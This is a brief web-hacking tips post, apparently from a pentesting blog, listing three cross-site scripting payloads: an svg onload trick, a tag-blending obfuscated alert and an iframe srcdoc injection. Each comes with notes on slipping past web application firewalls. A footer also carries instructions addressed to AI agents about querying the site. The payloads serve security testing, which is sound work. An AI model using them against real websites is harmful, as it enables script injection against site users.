# Week 46 - XSS Payloads

It’s been a while since I’ve shared some Cross-Site Scripting payloads with y’all, so here are some new ones I’ve found in the last couple of months:\
 \
`<svg onload=location=nextSibling.innerText>`\
`<b>javas<b></b>cript:al<b></b>ert(1)</b>`\
&#x20;\
This one is really interesting as it implements Tag Blending Obfuscation. Notice the keywords ‘javascript’ and ‘alert’ are separated here, which is great for bypassing potential WAFs. When the payload executes, the \<b> elements are concatenated, resulting in a good old alert box. You can read more about this technique here: <https://lnkd.in/eqhpG_nJ>\
&#x20;\
This next payload was introduced to me by my colleague [Evan Isaac](https://www.linkedin.com/in/ACoAADKz8eYBPIfHIl7zo0z4G-5tn0BctweNrFI):\
&#x20;\
`"><iframe srcdoc="<script>alert(1)</script>">`\
&#x20;\
This is a great payload for when a WAF is blocking HTML event attributes (onclick, onmouseover, etc) as well as standard script tags. Give this a try on your next engagement, and give Evan a follow for sharing!

See more here: <https://brutelogic.com.br/blog/tag-blending-obfuscation/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/week-46-xss-payloads.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.